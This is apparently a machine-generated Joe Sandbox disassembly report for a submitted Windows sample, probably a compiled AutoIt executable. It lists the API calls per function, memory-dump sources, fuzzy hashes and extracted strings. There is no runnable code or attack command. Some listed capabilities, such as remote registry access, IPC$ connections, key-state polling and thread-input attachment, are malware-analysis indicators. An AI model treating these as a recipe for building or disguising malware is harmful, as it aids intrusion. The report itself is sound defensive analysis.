                        • Opcode Fuzzy Hash: 4b1e03946bb45c43720d473f67c9f6c1df30f699a61b5cd0b5ffc6d15a3ce8fe
                        • Instruction Fuzzy Hash: A12196B0280385AFEB02DFE1EC89B753B6EF75576AF105434F415825A1DB769C028B15
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009EEA5D
                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009EEA73
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009EEA84
                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 009EEA96
                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 009EEAA7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: SendString$_wcslen
                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                        • API String ID: 2420728520-1007645807
                        • Opcode ID: c3146e287ca4018259a278094615055f4312c80f4be5afce83f8ea235c8a129f
                        • Instruction ID: db2026191a91c121b60de6150c08a35b8678bb04d3415c5f4e391984275b7b74
                        • Opcode Fuzzy Hash: c3146e287ca4018259a278094615055f4312c80f4be5afce83f8ea235c8a129f
                        • Instruction Fuzzy Hash: F0115135A9026979D721B7A2DC4AEFF6A7CFBD2F00F440829B411A21D1EAB00E05C6B1
                        APIs
                        • GetDlgItem.USER32(?,00000001), ref: 009E5CE2
                        • GetWindowRect.USER32(00000000,?), ref: 009E5CFB
                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 009E5D59
                        • GetDlgItem.USER32(?,00000002), ref: 009E5D69
                        • GetWindowRect.USER32(00000000,?), ref: 009E5D7B
                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 009E5DCF
                        • GetDlgItem.USER32(?,000003E9), ref: 009E5DDD
                        • GetWindowRect.USER32(00000000,?), ref: 009E5DEF
                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 009E5E31
                        • GetDlgItem.USER32(?,000003EA), ref: 009E5E44
                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009E5E5A
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 009E5E67
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$ItemMoveRect$Invalidate
                        • String ID:
                        • API String ID: 3096461208-0
                        • Opcode ID: f6d8c478b88f8c11b01f32e1ee66d094d3974110102987a9f16a0a33e34a5c9d
                        • Instruction ID: 43a9ee7e8bb19f313d2f21c8292ab9fe8956b7242fd428e94b68206a009e59e5
                        • Opcode Fuzzy Hash: f6d8c478b88f8c11b01f32e1ee66d094d3974110102987a9f16a0a33e34a5c9d
                        • Instruction Fuzzy Hash: 4D513F70B40605AFDF19CFA9CD89AAEBBB9FB48314F158129F515E7290D7709E01CB50
                        APIs
                          • Part of subcall function 00998F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00998BE8,?,00000000,?,?,?,?,00998BBA,00000000,?), ref: 00998FC5
                        • DestroyWindow.USER32(?), ref: 00998C81
                        • KillTimer.USER32(00000000,?,?,?,?,00998BBA,00000000,?), ref: 00998D1B
                        • DestroyAcceleratorTable.USER32(00000000), ref: 009D6973
                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00998BBA,00000000,?), ref: 009D69A1
                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00998BBA,00000000,?), ref: 009D69B8
                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00998BBA,00000000), ref: 009D69D4
                        • DeleteObject.GDI32(00000000), ref: 009D69E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                        • String ID:
                        • API String ID: 641708696-0
                        • Opcode ID: 29c58d553560ba4ef579a6560a0f93492ada902c3360fdaa2657cde9da7f5f34
                        • Instruction ID: 94d8658e2edee96434ca6418f57cc028799c91799d93891b761d5bf4cf7b1ca6
                        • Opcode Fuzzy Hash: 29c58d553560ba4ef579a6560a0f93492ada902c3360fdaa2657cde9da7f5f34
                        • Instruction Fuzzy Hash: BF618C30542700DFCF21DF68D958B6677F5FB46322F14891DE0829BAA0CB75AD82CB90
                        APIs
                          • Part of subcall function 00999944: GetWindowLongW.USER32(?,000000EB), ref: 00999952
                        • GetSysColor.USER32(0000000F), ref: 00999862
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ColorLongWindow
                        • String ID:
                        • API String ID: 259745315-0
                        • Opcode ID: 568aedb42fd55e67d02bcc3c8abb1a81a81f19fcd36d7ac1b5b70943f8e7ce73
                        • Instruction ID: d8d1cb61fc482593b7fa11613809798e24e5af32cec93454e98f0e1e6c16a6c1
                        • Opcode Fuzzy Hash: 568aedb42fd55e67d02bcc3c8abb1a81a81f19fcd36d7ac1b5b70943f8e7ce73
                        • Instruction Fuzzy Hash: 9641A231184644AFDF209F7D9C84BB97BA9EB06331F14861DF9A2872E1E7319C42DB11
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,009CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 009E9717
                        • LoadStringW.USER32(00000000,?,009CF7F8,00000001), ref: 009E9720
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,009CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 009E9742
                        • LoadStringW.USER32(00000000,?,009CF7F8,00000001), ref: 009E9745
                        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 009E9866
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString$Message_wcslen
                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                        • API String ID: 747408836-2268648507
                        • Opcode ID: e83e947701c053a1d6a02ab7f0ac245fcbc213cef0bf39edccd8d5e9996dc979
                        • Instruction ID: b877b8417d437cba88526e2232883d1efcbcc70a7341fb3742da76f933e25d4f
                        • Opcode Fuzzy Hash: e83e947701c053a1d6a02ab7f0ac245fcbc213cef0bf39edccd8d5e9996dc979
                        • Instruction Fuzzy Hash: 61414A72800219AACF05FBE0DE86FEEB378AF95740F544425F60672192EB356F49CB61
                        APIs
                          • Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A
                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009E07A2
                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009E07BE
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009E07DA
                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 009E0804
                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 009E082C
                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009E0837
                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009E083C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                        • API String ID: 323675364-22481851
                        • Opcode ID: ce0dbdef4aefe04e71b1925b7021613f8559c0586b249f485c5cc90c90d919ff
                        • Instruction ID: 2289581e63af4284ae35537f5a53853afa039205c943463dc52f29400e720fbe
                        • Opcode Fuzzy Hash: ce0dbdef4aefe04e71b1925b7021613f8559c0586b249f485c5cc90c90d919ff
                        • Instruction Fuzzy Hash: 2E411672C10229ABDF15EBA4DC85DEDB778FF84750B04812AE901A3261EB759E45CBA0
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 00A03C5C
                        • CoInitialize.OLE32(00000000), ref: 00A03C8A
                        • CoUninitialize.OLE32 ref: 00A03C94
                        • _wcslen.LIBCMT ref: 00A03D2D
                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00A03DB1
                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00A03ED5
                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00A03F0E
                        • CoGetObject.OLE32(?,00000000,00A1FB98,?), ref: 00A03F2D
                        • SetErrorMode.KERNEL32(00000000), ref: 00A03F40
                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A03FC4
                        • VariantClear.OLEAUT32(?), ref: 00A03FD8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                        • String ID:
                        • API String ID: 429561992-0
                        • Opcode ID: b788cc6dc9bc3fb79aa8e92a3c7793ed0a4c23b7b77457bd3e4468a942e756c3
                        • Instruction ID: c17aae0b99b0c5e701a5d56b200bb1a82bd93c5648605c5969027ceb93b688af
                        • Opcode Fuzzy Hash: b788cc6dc9bc3fb79aa8e92a3c7793ed0a4c23b7b77457bd3e4468a942e756c3
                        • Instruction Fuzzy Hash: 04C15772608309AFDB00DF68D88492BB7E9FF89744F04491DF98A9B291D730ED05CB52
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 009F7AF3
                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009F7B8F
                        • SHGetDesktopFolder.SHELL32(?), ref: 009F7BA3
                        • CoCreateInstance.OLE32(00A1FD08,00000000,00000001,00A46E6C,?), ref: 009F7BEF
                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009F7C74
                        • CoTaskMemFree.OLE32(?,?), ref: 009F7CCC
                        • SHBrowseForFolderW.SHELL32(?), ref: 009F7D57
                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009F7D7A
                        • CoTaskMemFree.OLE32(00000000), ref: 009F7D81
                        • CoTaskMemFree.OLE32(00000000), ref: 009F7DD6
                        • CoUninitialize.OLE32 ref: 009F7DDC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                        • String ID:
                        • API String ID: 2762341140-0
                        APIs
                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A15504
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A15515
                        • CharNextW.USER32(00000158), ref: 00A15544
                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A15585
                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A1559B
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A155AC
                        Similarity
                        • API ID: MessageSend$CharNext
                        • String ID:
                        • API String ID: 1350042424-0
                        APIs
                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 009DFAAF
                        • SafeArrayAllocData.OLEAUT32(?), ref: 009DFB08
                        • VariantInit.OLEAUT32(?), ref: 009DFB1A
                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 009DFB3A
                        • VariantCopy.OLEAUT32(?,?), ref: 009DFB8D
                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 009DFBA1
                        • VariantClear.OLEAUT32(?), ref: 009DFBB6
                        • SafeArrayDestroyData.OLEAUT32(?), ref: 009DFBC3
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009DFBCC
                        • VariantClear.OLEAUT32(?), ref: 009DFBDE
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009DFBE9
                        Similarity
                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                        • String ID:
                        • API String ID: 2706829360-0
                        APIs
                        • GetKeyboardState.USER32(?), ref: 009E9CA1
                        • GetAsyncKeyState.USER32(000000A0), ref: 009E9D22
                        • GetKeyState.USER32(000000A0), ref: 009E9D3D
                        • GetAsyncKeyState.USER32(000000A1), ref: 009E9D57
                        • GetKeyState.USER32(000000A1), ref: 009E9D6C
                        • GetAsyncKeyState.USER32(00000011), ref: 009E9D84
                        • GetKeyState.USER32(00000011), ref: 009E9D96
                        • GetAsyncKeyState.USER32(00000012), ref: 009E9DAE
                        • GetKeyState.USER32(00000012), ref: 009E9DC0
                        • GetAsyncKeyState.USER32(0000005B), ref: 009E9DD8
                        • GetKeyState.USER32(0000005B), ref: 009E9DEA
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        APIs
                        • WSAStartup.WSOCK32(00000101,?), ref: 00A005BC
                        • inet_addr.WSOCK32(?), ref: 00A0061C
                        • gethostbyname.WSOCK32(?), ref: 00A00628
                        • IcmpCreateFile.IPHLPAPI ref: 00A00636
                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A006C6
                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A006E5
                        • IcmpCloseHandle.IPHLPAPI(?), ref: 00A007B9
                        • WSACleanup.WSOCK32 ref: 00A007BF
                        Strings
                        Similarity
                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                        • String ID: Ping
                        • API String ID: 1028309954-2246546115
                        APIs
                        Strings
                        Similarity
                        • API ID: _wcslen$BuffCharLower
                        • String ID: cdecl$none$stdcall$winapi
                        • API String ID: 707087890-567219261
                        APIs
                        • CoInitialize.OLE32 ref: 00A03774
                        • CoUninitialize.OLE32 ref: 00A0377F
                        • CoCreateInstance.OLE32(?,00000000,00000017,00A1FB78,?), ref: 00A037D9
                        • IIDFromString.OLE32(?,?), ref: 00A0384C
                        • VariantInit.OLEAUT32(?), ref: 00A038E4
                        • VariantClear.OLEAUT32(?), ref: 00A03936
                        Strings
                        Similarity
                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                        • API String ID: 636576611-1287834457
                        APIs
                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 009F33CF
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 009F33F0
                        Strings
                        Similarity
                        • API ID: LoadString$_wcslen
                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                        • API String ID: 4099089115-3080491070
                        APIs
                        Strings
                        Similarity
                        • API ID: _wcslen$BuffCharUpper
                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                        • API String ID: 1256254125-769500911
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 009F53A0
                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 009F5416
                        • GetLastError.KERNEL32 ref: 009F5420
                        • SetErrorMode.KERNEL32(00000000,READY), ref: 009F54A7
                        Strings
                        Similarity
                        • API ID: Error$Mode$DiskFreeLastSpace
                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                        • API String ID: 4194297153-14809454
                        APIs
                        • CreateMenu.USER32 ref: 00A13C79
                        • SetMenu.USER32(?,00000000), ref: 00A13C88
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A13D10
                        • IsMenu.USER32(?), ref: 00A13D24
                        • CreatePopupMenu.USER32 ref: 00A13D2E
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A13D5B
                        • DrawMenuBar.USER32 ref: 00A13D63
                        Strings
                        Similarity
                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                        • String ID: 0$F
                        • API String ID: 161812096-3044882817
                        APIs
                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A13A9D
                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A13AA0
                        • GetWindowLongW.USER32(?,000000F0), ref: 00A13AC7
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A13AEA
                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A13B62
                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00A13BAC
                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00A13BC7
                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00A13BE2
                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00A13BF6
                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00A13C13
                        Similarity
                        • API ID: MessageSend$LongWindow
                        • String ID:
                        • API String ID: 312131281-0
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 009EB151
                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,009EA1E1,?,00000001), ref: 009EB165
                        • GetWindowThreadProcessId.USER32(00000000), ref: 009EB16C
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009EA1E1,?,00000001), ref: 009EB17B
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 009EB18D
                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,009EA1E1,?,00000001), ref: 009EB1A6
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009EA1E1,?,00000001), ref: 009EB1B8
                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009EA1E1,?,00000001), ref: 009EB1FD
                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,009EA1E1,?,00000001), ref: 009EB212
                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,009EA1E1,?,00000001), ref: 009EB21D
                        Similarity
                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                        • String ID:
                        • API String ID: 2156557900-0
                        APIs
                        • _free.LIBCMT ref: 009B2C94
                          • Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
                          • Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0
                        • _free.LIBCMT ref: 009B2CA0
                        • _free.LIBCMT ref: 009B2CAB
                        • _free.LIBCMT ref: 009B2CB6
                        • _free.LIBCMT ref: 009B2CC1
                        • _free.LIBCMT ref: 009B2CCC
                        • _free.LIBCMT ref: 009B2CD7
                        • _free.LIBCMT ref: 009B2CE2
                        • _free.LIBCMT ref: 009B2CED
                        • _free.LIBCMT ref: 009B2CFB
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        APIs
                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00981459
                        • OleUninitialize.OLE32(?,00000000), ref: 009814F8
                        • UnregisterHotKey.USER32(?), ref: 009816DD
                        • DestroyWindow.USER32(?), ref: 009C24B9
                        • FreeLibrary.KERNEL32(?), ref: 009C251E
                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 009C254B
                        Strings
                        Similarity
                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                        • String ID: close all
                        • API String ID: 469580280-3243417748
                        APIs
                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009F7FAD
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009F7FC1
                        • GetFileAttributesW.KERNEL32(?), ref: 009F7FEB
                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 009F8005
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009F8017
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009F8060
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009F80B0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CurrentDirectory$AttributesFile
                        • String ID: *.*
                        • API String ID: 769691225-438819550
                        • Opcode ID: dfaf3eea4530dd80b6ab5918b50a2691bfc6fd4147235f7a41757a5df63beb45
                        • Instruction ID: c890e22acd9b2ce9bd8d5d08c1dfc66c6f1575ec5e6c3a495c8bd31dc174a472
                        • Opcode Fuzzy Hash: dfaf3eea4530dd80b6ab5918b50a2691bfc6fd4147235f7a41757a5df63beb45
                        • Instruction Fuzzy Hash: E281AF715082099BCB20EF94C844ABAF3E8BF89314F584C5EFA95D7260EB34DD458B92
                        APIs
                        • SetWindowLongW.USER32(?,000000EB), ref: 00985C7A
                          • Part of subcall function 00985D0A: GetClientRect.USER32(?,?), ref: 00985D30
                          • Part of subcall function 00985D0A: GetWindowRect.USER32(?,?), ref: 00985D71
                          • Part of subcall function 00985D0A: ScreenToClient.USER32(?,?), ref: 00985D99
                        • GetDC.USER32 ref: 009C46F5
                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009C4708
                        • SelectObject.GDI32(00000000,00000000), ref: 009C4716
                        • SelectObject.GDI32(00000000,00000000), ref: 009C472B
                        • ReleaseDC.USER32(?,00000000), ref: 009C4733
                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009C47C4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                        • String ID: U
                        • API String ID: 4009187628-3372436214
                        • Opcode ID: 1c5be201fa5ae79157362fae69933f9981d264c5b04ac0160ab49829204f95fb
                        • Instruction ID: 6617c55a256eba91079bd95159b6b12b1ed8032e6a77478eb2a8a629d148892b
                        • Opcode Fuzzy Hash: 1c5be201fa5ae79157362fae69933f9981d264c5b04ac0160ab49829204f95fb
                        • Instruction Fuzzy Hash: 3571BC31A00205DFCF21DF64C9A4FEA3BB9FF4A364F144669ED555A2AAC3308851DF52
                        APIs
                        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 009F35E4
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • LoadStringW.USER32(00A52390,?,00000FFF,?), ref: 009F360A
                        Strings
